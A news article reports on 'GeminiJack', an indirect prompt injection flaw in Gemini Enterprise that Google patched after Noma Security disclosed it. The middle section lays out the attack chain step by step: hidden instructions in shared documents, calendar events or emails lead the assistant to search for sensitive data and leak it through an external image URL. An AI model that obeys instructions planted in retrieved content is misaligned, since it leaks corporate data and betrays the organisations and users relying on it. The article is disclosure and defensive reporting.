Google has patched a zero-click vulnerability in Gemini Enterprise that could lead to corporate data leaks.
The flaw was discovered in June 2025 by security researchers at Noma Security and reported to Google the same day.
Dubbed ‘GeminiJack’ by the researchers, it is an architectural weakness in Google Gemini Enterprise, Google’s set of corporate AI assistant tools, and in Vertex AI Search, a Google Cloud platform for building AI-powered search and recommendation experiences.
This weakness allows a type of indirect prompt injection enabling attackers to add malicious instructions to common documents in Gmail, Google Calendar, Google Documents – or any other Google Workspace components Gemini Enterprise has accessed to – to exfiltrate sensitive corporate information.
Exploiting this flaw does not require the target employee to click anywhere and does not trigger any security controls.
GeminiJack’s Attack Chain
The attacker only needs to embed hidden instructions inside a shared or externally contributed document to perform the attack.
Here is the breakdown of the attack chain’s main steps:
- Content poisoning: An attacker creates a seemingly harmless Google Doc, Calendar event or Gmail email containing hidden instructions for Gemini Enterprise to search for sensitive terms and embed results in an external image URL they control
- Trigger: A legitimate employee performs a routine search, unintentionally prompting the AI to process the attacker’s poisoned content
- AI execution: Gemini retrieves the attacker’s document, misinterprets the instructions as valid, and scans authorized Workspace data for the sensitive terms
- Exfiltration: The AI includes the attacker’s malicious image tag in its response. When loaded, the victim’s browser sends the stolen data to the attacker’s server via a standard HTTP request, bypassing traditional security checks
This attack worked because Google Gemini Enterprise AI’s search feature implements a Retrieval-Augmented Generation (RAG) architecture that allows organizations to query across multiple data sources in Google Workspace.
“Organizations must pre-configure which data sources the RAG system can access. This pre-configuration step determines the scope of data available to the Gemini model during query processing. Once configured, the system has persistent access to these data sources for all user queries,” said the Noma Security researchers.
“The vulnerability exploits the trust boundary between user-controlled content in data sources and the AI model’s instruction processing. An attacker can plant malicious instructions within content that gets retrieved and processed by the RAG system.”
Noma Security shared a step-by-step proof-of-concept (PoC) exploit for this vulnerability in its report on GeminiJack, published on December 8.
Adoption of Corporate AI Brings Growing Indirect Prompt Injection Risk
Google confirmed receipt of the vulnerability report from Noma Security in August and started to work with them to fix it.
The tech giant deployed updates that changed how Gemini Enterprise and Vertex AI Search interact with their underlying retrieval and indexing systems.
After the discovery, Vertex AI Search was fully separated from Gemini Enterprise and no longer uses the same large language model -powered (LLM) workflows or RAG capabilities.
However, the Noma Security researchers expect that this attack will not be the last of its kind.
They stated that traditional perimeter defense controls, endpoint protection solutions and data loss prevention tools “weren’t designed to detect when your AI assistant becomes an exfiltration engine.”
“As AI agents gain broader access to corporate data and autonomy to act on instructions, the blast radius of a single vulnerability expands exponentially. Organizations deploying AI systems with access to sensitive data must carefully consider trust boundaries, implement robust monitoring and stay informed about emerging AI security research,” the Noma Security researchers concluded.
The UK’s National Cyber Security Centre (NCSC) recently shared new guidance to mitigate prompt injection attacks.
